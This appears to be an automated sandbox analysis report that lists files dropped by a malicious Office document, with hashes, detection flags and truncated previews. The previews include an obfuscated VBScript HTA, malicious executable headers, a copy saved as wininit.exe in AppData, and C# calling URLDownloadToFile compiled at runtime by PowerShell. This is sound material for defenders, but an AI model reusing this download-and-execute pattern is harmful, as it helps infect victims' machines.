                                                    SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                    SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                    Malicious:false
                                                    Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:HTML document, ASCII text, with very long lines (23388), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):23556
                                                    Entropy (8bit):1.6848932886813717
                                                    Encrypted:false
                                                    SSDEEP:96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
                                                    MD5:EC0D423A3F72D69975A1E31A275F5377
                                                    SHA1:213922FB8456ECAADC24889AFEC1AC6EF5010C68
                                                    SHA-256:9FD433CD543AB161D2A3CCB96A265C79EE0BB1A513647C0C33C72114660C64AC
                                                    SHA-512:8132F567ABFD4E3489204D1F3A9FC8292457CE10495345CD0CCFA8074233411C8305C4D73078A7DEE02B086FBC22B8AD7047DD4BC127DE337D0800771EDF53AD
                                                    Malicious:true
                                                    Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<ScRipT LANGuagE="vBscRIpT">..DIm..............................................................................................................................................................................................................................................................................................................................................tzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK..............................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):600576
                                                    Entropy (8bit):7.913749036393697
                                                    Encrypted:false
                                                    SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                    MD5:66B03D1AFF27D81E62B53FC108806211
                                                    SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                    SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                    SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Joe Sandbox View:
                                                    • Filename: goodtoseeuthatgreatthingswithentirethingsgreatfor.hta, Detection: malicious, Browse
                                                    • Filename: PO-000041492.docx.doc, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):8192
                                                    Entropy (8bit):4.993098398477818
                                                    Encrypted:false
                                                    SSDEEP:96:J185Cb9Fxj5KCP+3yiefC+G2IDK+bO0awb9FxRP+3yiefC+G2IDK:JSgbrxVKCPlieq+G1OybrxRPlieq+G
                                                    MD5:30EEC76BECE2FDDD111476A1ECC35C26
                                                    SHA1:1EDD2EDC841C3BBCDF65F063F2CB4D8C9D22D565
                                                    SHA-256:1160D0EAE2012793EDA2B8EBC91061314DB25529B1E324268D1B2072EBA1AF88
                                                    SHA-512:0304E597CB8F0E7DCCF84E68D2DF209A1A924C467B9FEE16100DEFCC534294872B5E5D5ACCC722C218D79DA485403B54168ADEFFE0EBCE3E45932B593FD88EEE
                                                    Malicious:false
                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11776
                                                    Entropy (8bit):3.5282593043027797
                                                    Encrypted:false
                                                    SSDEEP:192:hOQ+tBZwG42b+pn0wke6hfXsWhAGLbOho20cB2uzM5Qsr8nWWLJKdQUcTCXw7N4+:0QafJv+pncfXsWhAG+0cBHkSWWdUcTTz
                                                    MD5:7844482DE837B7A77771E3C42A771683
                                                    SHA1:56E93764B342C84FAD56039FCF687003E5A95E3C
                                                    SHA-256:C23EBFBFEB0D7793E6DC212083F96A5C1E5AC20FA2BC060E2EA4C4C2D72D0ADC
                                                    SHA-512:3A9DBDC07D516CD234B3F7882AC4192326CB805EFBAF82E68A6C6AC2B29E07A5625704B1A1487B0474CF24152518DE489C7A410BCD07C8FAC01297B33E377E84
                                                    Malicious:false
                                                    Preview:........4.2.0.3.9.5.9.2.9.5.9.8._.&.=.).@.?.=.7.(.@.0.6.?.3.%.%.'.(.?.?.-.'.>.`.1.<...$.0.'.8.|.`._.[...?.0.].%._...:.@.&.^.8.....1...|.....4.3.?.>._.9.6.?.=.?.!...%.=.#.?.%.~./.;.!.+.(.,.#.^.%.`.$.!.!.?.0.?.!.].%.<.0.-.0.0.>.).!...4.3.|.?.6.$...?.:.$.#.[.$...>.9.:.^.^.&.$...*.<./.5.~.-.(.,.].:.^.*.3.<.;.;.7.!.+.5./.^...?.;.$.-.<.(...3...=.7.1.[.?.?...8.6.+.0.6.;.$.'.8.4.5.*.?.<.(.?.6.@.`.!._.7.?.,.@.;.-.@.&.-.3.%._.&.-.9.&.$.%.0._.%.!.:.?.'.?.[.`.:.?.9.&./.?.&.?.1.`...3...?.'.7.%.?.8.=._.`.7.0.).4.?.-.6.[.0.$.5.`.`...|.|.%.~.+.$.2...6.(.)./.0.=...1.0...9.....?.#.8.6.<.?.%.7.*._.>.:.1.?.?._./.2.~.4.).+...5.(.%.^.#.1.4.9.:...^.=.7.+.&.'.`...4.?./.1.1.?._.+.0.=.%.`.+.~.:.?...*.'.[.?.%.^.#.?.4.=.,.,._.`.|.?...?...$.6.#.*.%.>.&.>.;.).+.4.?.9.?.0.?.~.&.-.`.'.?.?.8.).8.%...<.'.=...#.9.#.3.-.'.5.:.*.$.%.%.[.6.*.[.:.1.#.#.....@.=.&...3.&.=...5.`.5...?.?.8./.-.8.&.[.^.?.=.?...|.^./.?.&.~.(.]./.#.<.~...9.[.8.?...?.4.].+.%.@.@.%...2.-...6.4.>...<...1.>.`.(.7.0.?.|.8.`.$.?.1.,.~.[.^.8.?.0.).?.=.;.
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
                                                    Category:dropped
                                                    Size (bytes):480
                                                    Entropy (8bit):3.827531183529261
                                                    Encrypted:false
                                                    SSDEEP:6:V/DsYLDS81zuwAH0kHMelQXReKJ8SRHy4HjvWbuMC5NjN6qQy:V/DTLDfuwaKXfH/WCpiy
                                                    MD5:B0517586F4097114E790C61F2685F0D5
                                                    SHA1:20F7482298AB96731228EBD5242CEDDFD72FF50F
                                                    SHA-256:A738E3AF6F29EDD637630B0299F306056042EA1C73850EEE95498499F5D90237
                                                    SHA-512:C28702017CE7FE0D34BEA38CEF48DF3BB65C63D92DDDD6F8264F7262F7AE61B8D71BCD6FEC06D0792373D15BA84FB2A1D0C26B0FE5755BC20505A9197D654BA0
                                                    Malicious:false
                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace LYPhpfZVh.{. public class PKJmdq. {. [DllImport("uRLMoN.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr LODMlIYFHF,string eO,string Lrd,uint kCMv,IntPtr sKwhSUgFd);.. }..}.
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):369
                                                    Entropy (8bit):5.273472852091011
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fMWx0zxs7+AEszIP23fMWQWHn:p37Lvkmb6KzUWx0WZEoUWQAn
                                                    MD5:FF512205CB8AFE3E1A3DAEA9D2124A71
                                                    SHA1:DA8BCBBEA0F55ECC4A06E364C22D1278D2CF4548
                                                    SHA-256:381AF373BDC585989B4EA3094D57F2D8CBD83512721FECAC9E64E6F0966FAB4D
                                                    SHA-512:7AC0D788791079463AA0529912F39E82440C2E8411C4B93437D6B6810802C906A8E23C3123C2E5E19C0DB4637229C70B4B1B4C12B1E8385C31833BE9BA583C70
                                                    Malicious:true
                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.0.cs"
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3072
                                                    Entropy (8bit):2.8507880809883632
                                                    Encrypted:false
                                                    SSDEEP:24:etGSVPBe5ekrl88NRck5wpjwujf/UoItkZfdI/tjbCZ0WI+ycuZhNjakS1PNnq:6Oskr+Wqlf8o/JdStbCZX1ulja3vq
                                                    MD5:BFDE5D3AE0B5E5B9B4AF6A460712C3FD
                                                    SHA1:0F4217A769BB4ED6DA0A56691A9A32F1E2328C8F
                                                    SHA-256:72C8FC6AFEB642BCAED76D6E38960AC285D59E9ACB018B0065DF0C6251E1316F
                                                    SHA-512:CCD059D0DF20BC1417960E542FE01081B1BD66CEFF08CAE31E0C50C337491189999D2CD53E3A2AA8A13789A86DBD8FAD771157B5CE810E80BEA60F5716FAD0B8
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....x.....x.......................................... ?.....P ......Q.........W.....b.....e.....i.....n...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.4v
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):864
                                                    Entropy (8bit):5.341911873285087
                                                    Encrypted:false
                                                    SSDEEP:24:Aqd3ka6KzUWxVEoUWQAuKaMD5DqBVKVrdFAMBJTH:Aika60XEobuKdDcVKdBJj
                                                    MD5:426A1C829C62EB97F219A2AFD4A89384
                                                    SHA1:39F758891B842E4DDA7579685E82096488496F8C
                                                    SHA-256:7CBD679B23E4E843FBA49C194D2372E62AB01F70449EBC08F0B4ADB7E11B0888
                                                    SHA-512:33EBF8EE5BB53DAB099803850591C7531D1CB16C9E4717B4ECE7488B2D39223F6485AAA32650CB2DA578DC1F242F33E6F13DCEF46E7C05DC11212B02982530DD
                                                    Malicious:false
                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):3.113947070769744
                                                    Encrypted:false
                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8Gak7YnqqdXPN5Dlq5J:+RI+ycuZhNjakS1PNnqX
                                                    MD5:8A925FA1455B46CFCD59D90334261564
                                                    SHA1:9F94B750D66756F49DEE8D1E0D119A6AC7357FAD
                                                    SHA-256:644BEAB2D4E59B92CBF690FFC88C2784C8AB86CAB4F3A0827D7586FB2120587A
                                                    SHA-512:1B12B7B16C94C7670D690D98A8D8C14D733F9B610DF468F9D8CCB52130C4E9290CD2FC374510B9F94412E5CE45249D45ADE89EAA08505B49434D35EA137AF4B5
                                                    Malicious:false
                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.v.z.o.p.k.v.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.v.z.o.p.k.v.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Wed Nov 20 10:08:06 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1324
                                                    Entropy (8bit):3.989621233271636
                                                    Encrypted:false
                                                    SSDEEP:24:Hr69vrU4odH6wKPfeI+ycuZhNjakS1PNnqSud:qrlAxKPm1ulja3vqSu
                                                    MD5:7D95280C19E87BE4C01F9F151866ACB1
                                                    SHA1:337431760AC42F9EED007AF072D8770A22EDEAB5
                                                    SHA-256:CB7569CAFCDFC24B7152F6DBFD7890623CC69C34D2BE8E5D555F2BDE250E2221
                                                    SHA-512:0E19129FF53080D56BBBCBE5BA80EEE7C79BF37154CDCDA75B90604536B1587E8972A5E0CC8AD74C3706E045B774E4DC666519DCBD6179DCBD30B607976A844D
                                                    Malicious:false
                                                    Preview:L.....=g.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........S....c:\Users\user\AppData\Local\Temp\4vzopkvk\CSC2CE1E80E8DFB46C4BC398124C902BE0.TMP.................._.E[F..Y..4&.d..........4.......C:\Users\user\AppData\Local\Temp\RES4441.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.v.z.o.p.k.v.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):600576
                                                    Entropy (8bit):7.913749036393697
                                                    Encrypted:false
                                                    SSDEEP:12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
                                                    MD5:66B03D1AFF27D81E62B53FC108806211
                                                    SHA1:2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
                                                    SHA-256:59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
                                                    SHA-512:9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
                                                    Malicious:true
                                                    Joe Sandbox View:
                                                    • Filename: goodtoseeuthatgreatthingswithentirethingsgreatfor.hta, Detection: malicious, Browse
                                                    • Filename: PO-000041492.docx.doc, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                    Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1
                                                    Process:C:\Users\user\AppData\Roaming\wininit.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):46
                                                    Entropy (8bit):1.0424600748477153
                                                    Encrypted:false
                                                    SSDEEP:3:/lbWwWl:sZ
                                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                    Malicious:false
                                                    Preview:........................................user.
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Generic INItialization configuration [folders]
                                                    Category:dropped
                                                    Size (bytes):50
                                                    Entropy (8bit):4.371663380285987
                                                    Encrypted:false
                                                    SSDEEP:3:M1WM6lm4+M6lv:MgM6EM61
                                                    MD5:CAC0A2DFD591C06B715A03572E13E7C3
                                                    SHA1:4636C3BC29142B05FFBB2EC5770C7133F1BF7009
                                                    SHA-256:C2EAC5C8228ABB454948D8239C63793A12E6F1D5BFB65010FD0E23EA0DCC347E
                                                    SHA-512:5FBC9A81A9E54D25D35613307D28D86533BA2ED0EF8A1D40DB04A212772EFFC6C550B7BDEC303A7F0729B8D5A761DB6BBDDAB456E504A6646DF89B8E28D58EDF
                                                    Malicious:false
                                                    Preview:[doc]..stthigns.LNK=0..[folders]..stthigns.LNK=0..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Wed Nov 20 09:07:55 2024, length=257200, window=hide
                                                    Category:dropped
                                                    Size (bytes):1004
                                                    Entropy (8bit):4.510893388182492
                                                    Encrypted:false
                                                    SSDEEP:12:81tERgXg/XAlCPCHaXfBOB/BGFX+WSSPQrUJoNogicvb4u0Ps+DtZ3YilMMEpxRh:81u/XTvsbksSre58RDv3qc57u
                                                    MD5:A63AF7A2FA4DBAFFE832F11933CE0B84
                                                    SHA1:8D9EA6EA4301EDB62995036FC9F162860B4BFF58
                                                    SHA-256:902049B90C141CC40666B4F5FC2443D44AE66268C1E1469B7734F2A820CE7BE1
                                                    SHA-512:47BA5E3E272DD2D11AA1995C313ED23233CF734728034FDA68E39BD9F314FF1BCECA7B4099B8F1C078C45C07225D681F676F752C4149B6B2BDF365294C295B40
                                                    Malicious:false
